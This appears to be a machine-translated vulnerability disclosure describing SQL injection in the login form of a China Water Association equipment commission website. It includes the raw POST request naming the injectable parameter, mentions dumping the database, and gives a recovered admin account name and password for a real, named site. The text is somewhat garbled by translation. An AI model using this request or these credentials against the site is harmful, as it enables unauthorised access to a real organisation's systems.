China Water Association equipment Commission's website SQL Injection

China Water Association equipment Commission's website SQL Injection

China Water Association equipment network-China Water Industry Authority-China Water Association equipment Commission's website, SQL injection to login website management background management website

POST injection (txtAccount ):

POST/userlogin. aspx? Url =/magzartlist. aspx? Mcid = 2 HTTP/1.1

Accept: text/html, application/xhtml + xml, image/jxr ,*/*

Referer: http: // **. **/userlogin. aspx? Mid = 11 & url =/magzartlist. aspx? Mcid = 3

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv: 11.0) like Gecko

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Content-Length: 74

Host :**.**.**.**

Pragma: no-cache

Cookie: ASP. NET_SessionId = x1kmv145jo5zcd45nrbomr45

TxtAccount = admin & txtPwd = admin & txtValCode = 14281 & cbSaveAccount = true & x = 53 & y = 7

Database:

Database Table:

Database explosion:

Check if there is a record, and check the password hash value.

Account: zhangyao password: zhangyao

Login successful->

This account has been able to manage the website. No further attempts have been made, and shell is still learning.

Solution:

Filter and change the password.